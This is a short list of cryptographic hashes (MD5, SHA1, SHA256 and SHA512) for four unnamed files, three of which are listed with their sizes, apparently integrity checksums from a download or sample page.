MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 12.5MB
MD5: 8913eca34d27762a5ec07b236f8a09b0
SHA1: 0cfaa984f78b88c2a545a03af26f4b4fef1dd03e
SHA256: 83be370335986f06373f4553cf5c3722a0a7ff1fd2874e9bf5170afbf133ec9d
SHA512: 1b0a05494c64bafff3231a8f10c5ce7defca0a267585a94834dd5e511273ff1b0f38b35427752abd9dd2b24f56a8f9e78f6b9519cda7cc5603afdf0416e1412d

Filesize: 12.5MB
MD5: 04562abb84bf708e1f0fcfc4564b56ae
SHA1: 5d3234dbefc9c4ecb3b4a5c77f72c2446630e3a7
SHA256: 6a420818d4d5621f021511b74207479f84f94dc84e43b4971774b5f4ac92f88c
SHA512: 3688ab9785d7a9f584174b08ffeba6de1b83d788cf6012b158d903ab21273703d8953dd620cfbcbf36b60bec5ad8b6784cbc1f590bbabe66a43e5a8f8bfcab6a

Filesize: 442KB
MD5: 04029e121a0cfa5991749937dd22a1d9
SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b